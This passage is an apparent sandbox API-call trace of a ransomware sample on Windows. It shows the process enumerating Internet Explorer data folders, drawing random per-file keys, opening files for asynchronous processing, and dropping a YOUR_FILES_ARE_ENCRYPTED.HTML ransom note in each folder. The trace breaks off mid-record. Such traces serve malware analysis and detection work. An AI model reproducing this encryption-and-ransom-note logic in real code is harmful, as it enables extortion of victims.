[0111.110] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0111.110] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Internet Explorer\\EmieUserList" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Internet Explorer\\EmieUserList") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Internet Explorer\\EmieUserList" [0111.111] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Internet Explorer\\EmieUserList", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Internet Explorer\\EmieUserList\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Internet Explorer\\EmieUserList\\*" [0111.111] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Internet Explorer\\EmieUserList\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x5112b602, ftCreationTime.dwHighDateTime=0x1d70a81, ftLastAccessTime.dwLowDateTime=0x5112dcfe, ftLastAccessTime.dwHighDateTime=0x1d70a81, ftLastWriteTime.dwLowDateTime=0x5112dcfe, ftLastWriteTime.dwHighDateTime=0x1d70a81, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e324, dwReserved1=0x261f199, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0111.111] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x5112b602, ftCreationTime.dwHighDateTime=0x1d70a81, ftLastAccessTime.dwLowDateTime=0x5112dcfe, ftLastAccessTime.dwHighDateTime=0x1d70a81, ftLastWriteTime.dwLowDateTime=0x5112dcfe, ftLastWriteTime.dwHighDateTime=0x1d70a81, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e324, dwReserved1=0x261f199, cFileName="..", cAlternateFileName="")) returned 1 [0111.111] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x5112dcfe, ftCreationTime.dwHighDateTime=0x1d70a81, ftLastAccessTime.dwLowDateTime=0x5112dcfe, ftLastAccessTime.dwHighDateTime=0x1d70a81, ftLastWriteTime.dwLowDateTime=0x5112dcfe, ftLastWriteTime.dwHighDateTime=0x1d70a81, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e324, dwReserved1=0x261f199, cFileName="container.dat", cAlternateFileName="CONTAI~1.DAT")) returned 1 [0111.111] StrStrIW (lpFirst="container.dat", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0111.111] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Internet Explorer\\EmieUserList\\container.dat") returned 94 [0111.111] PathFindExtensionW (pszPath="container.dat") returned=".dat" [0111.111] lstrlenW (lpString=".dat") returned 4 [0111.111] PathFindExtensionW (pszPath="container.dat") returned=".dat" [0111.111] SystemFunction036 (in: RandomBuffer=0x19e16c, RandomBufferLength=0x20 | out: RandomBuffer=0x19e16c) returned 1 [0111.111] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Internet Explorer\\EmieUserList\\container.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\internet explorer\\emieuserlist\\container.dat"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x310 [0111.111] GetFileSizeEx (in: hFile=0x310, lpFileSize=0x19e190 | out: lpFileSize=0x19e190*=0) returned 1 [0111.111] CloseHandle (hObject=0x310) returned 1 [0111.112] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x5112dcfe, ftCreationTime.dwHighDateTime=0x1d70a81, ftLastAccessTime.dwLowDateTime=0x5112dcfe, ftLastAccessTime.dwHighDateTime=0x1d70a81, ftLastWriteTime.dwLowDateTime=0x5112dcfe, ftLastWriteTime.dwHighDateTime=0x1d70a81, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e324, dwReserved1=0x261f199, cFileName="container.dat", cAlternateFileName="CONTAI~1.DAT")) returned 0 [0111.124] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0111.124] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Internet Explorer\\EmieUserList\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 110 [0111.124] GetProcessHeap () returned 0x600000 [0111.124] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3183de0 [0111.125] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Internet Explorer\\EmieUserList\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\internet explorer\\emieuserlist\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c [0111.125] WriteFile (in: hFile=0x31c, lpBuffer=0x3183de0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x3183de0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0111.127] CloseHandle (hObject=0x31c) returned 1 [0111.127] GetProcessHeap () returned 0x600000 [0111.127] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3183de0 | out: hHeap=0x600000) returned 1 [0111.128] GetProcessHeap () returned 0x600000 [0111.128] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0111.129] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x431ab1e5, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x431ab1e5, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x600a7168, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x92, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="ie4uinit-ClearIconCache.log", cAlternateFileName="IE4UIN~2.LOG")) returned 1 [0111.129] StrStrIW (lpFirst="ie4uinit-ClearIconCache.log", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0111.129] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Internet Explorer\\ie4uinit-ClearIconCache.log") returned 95 [0111.129] PathFindExtensionW (pszPath="ie4uinit-ClearIconCache.log") returned=".log" [0111.129] lstrlenW (lpString=".log") returned 4 [0111.129] PathFindExtensionW (pszPath="ie4uinit-ClearIconCache.log") returned=".log" [0111.129] SystemFunction036 (in: RandomBuffer=0x19e480, RandomBufferLength=0x20 | out: RandomBuffer=0x19e480) returned 1 [0111.129] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Internet Explorer\\ie4uinit-ClearIconCache.log" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\internet explorer\\ie4uinit-cleariconcache.log"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x31c [0111.129] GetFileSizeEx (in: hFile=0x31c, lpFileSize=0x19e4a4 | out: lpFileSize=0x19e4a4*=146) returned 1 [0111.130] CloseHandle (hObject=0x31c) returned 1 [0111.130] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4137bbef, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x4137bbef, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x431128d7, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x514, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="ie4uinit-UserConfig.log", cAlternateFileName="IE4UIN~1.LOG")) returned 1 [0111.130] StrStrIW (lpFirst="ie4uinit-UserConfig.log", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0111.130] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Internet Explorer\\ie4uinit-UserConfig.log") returned 91 [0111.130] PathFindExtensionW (pszPath="ie4uinit-UserConfig.log") returned=".log" [0111.130] lstrlenW (lpString=".log") returned 4 [0111.130] PathFindExtensionW (pszPath="ie4uinit-UserConfig.log") returned=".log" [0111.130] SystemFunction036 (in: RandomBuffer=0x19e480, RandomBufferLength=0x20 | out: RandomBuffer=0x19e480) returned 1 [0111.130] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Internet Explorer\\ie4uinit-UserConfig.log" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\internet explorer\\ie4uinit-userconfig.log"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x31c [0111.130] GetFileSizeEx (in: hFile=0x31c, lpFileSize=0x19e4a4 | out: lpFileSize=0x19e4a4*=1300) returned 1 [0111.130] GetProcessHeap () returned 0x600000 [0111.130] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x30a0048 [0111.134] wsprintfW (in: param_1=0x19e3be, param_2="%02X" | out: param_1="3A") returned 2 [0111.134] wsprintfW (in: param_1=0x19e3c2, param_2="%02X" | out: param_1="08") returned 2 [0111.134] wsprintfW (in: param_1=0x19e3c6, param_2="%02X" | out: param_1="02") returned 2 [0111.134] wsprintfW (in: param_1=0x19e3ca, param_2="%02X" | out: param_1="9A") returned 2 [0111.134] wsprintfW (in: param_1=0x19e3ce, param_2="%02X" | out: param_1="2E") returned 2 [0111.134] wsprintfW (in: param_1=0x19e3d2, param_2="%02X" | out: param_1="82") returned 2 [0111.134] wsprintfW (in: param_1=0x19e3d6, param_2="%02X" | out: param_1="78") returned 2 [0111.134] wsprintfW (in: param_1=0x19e3da, param_2="%02X" | out: param_1="8D") returned 2 [0111.134] wsprintfW (in: param_1=0x19e3de, param_2="%02X" | out: param_1="5F") returned 2 [0111.134] wsprintfW (in: param_1=0x19e3e2, param_2="%02X" | out: param_1="00") returned 2 [0111.134] wsprintfW (in: param_1=0x19e3e6, param_2="%02X" | out: param_1="47") returned 2 [0111.134] wsprintfW (in: param_1=0x19e3ea, param_2="%02X" | out: param_1="0E") returned 2 [0111.134] wsprintfW (in: param_1=0x19e3ee, param_2="%02X" | out: param_1="3B") returned 2 [0111.134] wsprintfW (in: param_1=0x19e3f2, param_2="%02X" | out: param_1="B1") returned 2 [0111.134] wsprintfW (in: param_1=0x19e3f6, param_2="%02X" | out: param_1="8B") returned 2 [0111.134] wsprintfW (in: param_1=0x19e3fa, param_2="%02X" | out: param_1="94") returned 2 [0111.134] wsprintfW (in: param_1=0x19e3fe, param_2="%02X" | out: param_1="79") returned 2 [0111.134] wsprintfW (in: param_1=0x19e402, param_2="%02X" | out: param_1="1E") returned 2 [0111.135] wsprintfW (in: param_1=0x19e406, param_2="%02X" | out: param_1="E7") returned 2 [0111.135] wsprintfW (in: param_1=0x19e40a, param_2="%02X" | out: param_1="B2") returned 2 [0111.135] wsprintfW (in: param_1=0x19e40e, param_2="%02X" | out: param_1="49") returned 2 [0111.135] wsprintfW (in: param_1=0x19e412, param_2="%02X" | out: param_1="91") returned 2 [0111.135] wsprintfW (in: param_1=0x19e416, param_2="%02X" | out: param_1="AD") returned 2 [0111.135] wsprintfW (in: param_1=0x19e41a, param_2="%02X" | out: param_1="65") returned 2 [0111.135] wsprintfW (in: param_1=0x19e41e, param_2="%02X" | out: param_1="D0") returned 2 [0111.135] wsprintfW (in: param_1=0x19e422, param_2="%02X" | out: param_1="AC") returned 2 [0111.135] wsprintfW (in: param_1=0x19e426, param_2="%02X" | out: param_1="0C") returned 2 [0111.135] wsprintfW (in: param_1=0x19e42a, param_2="%02X" | out: param_1="A4") returned 2 [0111.135] wsprintfW (in: param_1=0x19e42e, param_2="%02X" | out: param_1="C7") returned 2 [0111.135] wsprintfW (in: param_1=0x19e432, param_2="%02X" | out: param_1="96") returned 2 [0111.135] wsprintfW (in: param_1=0x19e436, param_2="%02X" | out: param_1="3B") returned 2 [0111.135] wsprintfW (in: param_1=0x19e43a, param_2="%02X" | out: param_1="27") returned 2 [0111.136] lstrcpyW (in: lpString1=0x30b00fc, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Internet Explorer\\ie4uinit-UserConfig.log" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Internet Explorer\\ie4uinit-UserConfig.log") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Internet Explorer\\ie4uinit-UserConfig.log" [0111.136] CreateIoCompletionPort (FileHandle=0x31c, ExistingCompletionPort=0x274, CompletionKey=0x30a0048, NumberOfConcurrentThreads=0x0) returned 0x274 [0111.136] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x30a0048, lpOverlapped=0x30a0048) returned 1 [0111.136] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x42cc0372, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x42cc0372, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x42cc0372, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="IECompatData", cAlternateFileName="IECOMP~1")) returned 1 [0111.136] StrStrIW (lpFirst="IECompatData", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0111.136] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Internet Explorer\\IECompatData") returned 80 [0111.136] GetProcessHeap () returned 0x600000 [0111.136] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0111.137] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Internet Explorer\\IECompatData" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Internet Explorer\\IECompatData") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Internet Explorer\\IECompatData" [0111.137] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Internet Explorer\\IECompatData", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Internet Explorer\\IECompatData\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Internet Explorer\\IECompatData\\*" [0111.137] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Internet Explorer\\IECompatData\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x42cc0372, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x42cc0372, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x42cc0372, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e324, dwReserved1=0x30b6822, cFileName=".", cAlternateFileName="")) returned 0x626838 [0111.137] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x42cc0372, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x42cc0372, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x42cc0372, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e324, dwReserved1=0x30b6822, cFileName="..", cAlternateFileName="")) returned 1 [0111.138] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x42cc0372, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x42cc0372, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x42cc0372, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0xc10, dwReserved0=0x19e324, dwReserved1=0x30b6822, cFileName="iecompatdata.xml", cAlternateFileName="IECOMP~1.XML")) returned 1 [0111.138] StrStrIW (lpFirst="iecompatdata.xml", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0111.138] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Internet Explorer\\IECompatData\\iecompatdata.xml") returned 97 [0111.138] PathFindExtensionW (pszPath="iecompatdata.xml") returned=".xml" [0111.138] lstrlenW (lpString=".xml") returned 4 [0111.138] PathFindExtensionW (pszPath="iecompatdata.xml") returned=".xml" [0111.138] SystemFunction036 (in: RandomBuffer=0x19e16c, RandomBufferLength=0x20 | out: RandomBuffer=0x19e16c) returned 1 [0111.138] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Internet Explorer\\IECompatData\\iecompatdata.xml" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\internet explorer\\iecompatdata\\iecompatdata.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x310 [0111.139] GetFileSizeEx (in: hFile=0x310, lpFileSize=0x19e190 | out: lpFileSize=0x19e190*=3088) returned 1 [0111.139] GetProcessHeap () returned 0x600000 [0111.139] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x30c81a0 [0111.141] wsprintfW (in: param_1=0x19e0aa, param_2="%02X" | out: param_1="CA") returned 2 [0111.141] wsprintfW (in: param_1=0x19e0ae, param_2="%02X" | out: param_1="74") returned 2 [0111.141] wsprintfW (in: param_1=0x19e0b2, param_2="%02X" | out: param_1="F0") returned 2 [0111.141] wsprintfW (in: param_1=0x19e0b6, param_2="%02X" | out: param_1="8F") returned 2 [0111.141] wsprintfW (in: param_1=0x19e0ba, param_2="%02X" | out: param_1="01") returned 2 [0111.141] wsprintfW (in: param_1=0x19e0be, param_2="%02X" | out: param_1="9F") returned 2 [0111.141] wsprintfW (in: param_1=0x19e0c2, param_2="%02X" | out: param_1="DB") returned 2 [0111.141] wsprintfW (in: param_1=0x19e0c6, param_2="%02X" | out: param_1="E2") returned 2 [0111.141] wsprintfW (in: param_1=0x19e0ca, param_2="%02X" | out: param_1="51") returned 2 [0111.141] wsprintfW (in: param_1=0x19e0ce, param_2="%02X" | out: param_1="2A") returned 2 [0111.141] wsprintfW (in: param_1=0x19e0d2, param_2="%02X" | out: param_1="43") returned 2 [0111.141] wsprintfW (in: param_1=0x19e0d6, param_2="%02X" | out: param_1="C4") returned 2 [0111.141] wsprintfW (in: param_1=0x19e0da, param_2="%02X" | out: param_1="BA") returned 2 [0111.141] wsprintfW (in: param_1=0x19e0de, param_2="%02X" | out: param_1="8E") returned 2 [0111.141] wsprintfW (in: param_1=0x19e0e2, param_2="%02X" | out: param_1="F9") returned 2 [0111.141] wsprintfW (in: param_1=0x19e0e6, param_2="%02X" | out: param_1="2D") returned 2 [0111.141] wsprintfW (in: param_1=0x19e0ea, param_2="%02X" | out: param_1="79") returned 2 [0111.141] wsprintfW (in: param_1=0x19e0ee, param_2="%02X" | out: param_1="64") returned 2 [0111.141] wsprintfW (in: param_1=0x19e0f2, param_2="%02X" | out: param_1="72") returned 2 [0111.141] wsprintfW (in: param_1=0x19e0f6, param_2="%02X" | out: param_1="33") returned 2 [0111.141] wsprintfW (in: param_1=0x19e0fa, param_2="%02X" | out: param_1="58") returned 2 [0111.141] wsprintfW (in: param_1=0x19e0fe, param_2="%02X" | out: param_1="2E") returned 2 [0111.141] wsprintfW (in: param_1=0x19e102, param_2="%02X" | out: param_1="5A") returned 2 [0111.142] wsprintfW (in: param_1=0x19e106, param_2="%02X" | out: param_1="64") returned 2 [0111.142] wsprintfW (in: param_1=0x19e10a, param_2="%02X" | out: param_1="A4") returned 2 [0111.142] wsprintfW (in: param_1=0x19e10e, param_2="%02X" | out: param_1="2B") returned 2 [0111.142] wsprintfW (in: param_1=0x19e112, param_2="%02X" | out: param_1="96") returned 2 [0111.142] wsprintfW (in: param_1=0x19e116, param_2="%02X" | out: param_1="45") returned 2 [0111.142] wsprintfW (in: param_1=0x19e11a, param_2="%02X" | out: param_1="AC") returned 2 [0111.142] wsprintfW (in: param_1=0x19e11e, param_2="%02X" | out: param_1="79") returned 2 [0111.142] wsprintfW (in: param_1=0x19e122, param_2="%02X" | out: param_1="0C") returned 2 [0111.142] wsprintfW (in: param_1=0x19e126, param_2="%02X" | out: param_1="7D") returned 2 [0111.142] lstrcpyW (in: lpString1=0x30d8254, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Internet Explorer\\IECompatData\\iecompatdata.xml" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Internet Explorer\\IECompatData\\iecompatdata.xml") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Internet Explorer\\IECompatData\\iecompatdata.xml" [0111.142] CreateIoCompletionPort (FileHandle=0x310, ExistingCompletionPort=0x274, CompletionKey=0x30c81a0, NumberOfConcurrentThreads=0x0) returned 0x274 [0111.142] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x30c81a0, lpOverlapped=0x30c81a0) returned 1 [0111.147] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x42cc0372, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x42cc0372, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x42cc0372, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0xc10, dwReserved0=0x19e324, dwReserved1=0x30b6822, cFileName="iecompatdata.xml", cAlternateFileName="IECOMP~1.XML")) returned 0 [0111.147] FindClose (in: hFindFile=0x626838 | out: hFindFile=0x626838) returned 1 [0111.147] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Internet Explorer\\IECompatData\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 110 [0111.147] GetProcessHeap () returned 0x600000 [0111.147] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3183de0 [0111.148] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Internet Explorer\\IECompatData\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\internet explorer\\iecompatdata\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c [0111.163] WriteFile (in: hFile=0x31c, lpBuffer=0x3183de0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x3183de0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0111.164] CloseHandle (hObject=0x31c) returned 1 [0111.165] GetProcessHeap () returned 0x600000 [0111.165] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3183de0 | out: hHeap=0x600000) returned 1 [0111.165] GetProcessHeap () returned 0x600000 [0111.165] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0111.166] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xa7440614, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xa7440614, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xa7440614, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="IEFlipAheadCache", cAlternateFileName="IEFLIP~1")) returned 1 [0111.166] StrStrIW (lpFirst="IEFlipAheadCache", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0111.166] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Internet Explorer\\IEFlipAheadCache") returned 84 [0111.166] GetProcessHeap () returned 0x600000 [0111.166] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0111.167] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Internet Explorer\\IEFlipAheadCache" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Internet Explorer\\IEFlipAheadCache") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Internet Explorer\\IEFlipAheadCache" [0111.167] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Internet Explorer\\IEFlipAheadCache", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Internet Explorer\\IEFlipAheadCache\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Internet Explorer\\IEFlipAheadCache\\*" [0111.167] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Internet Explorer\\IEFlipAheadCache\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xa7440614, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xa7440614, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xa7446414, ftLastWriteTime.dwHighDateTime=0x1d7347a, 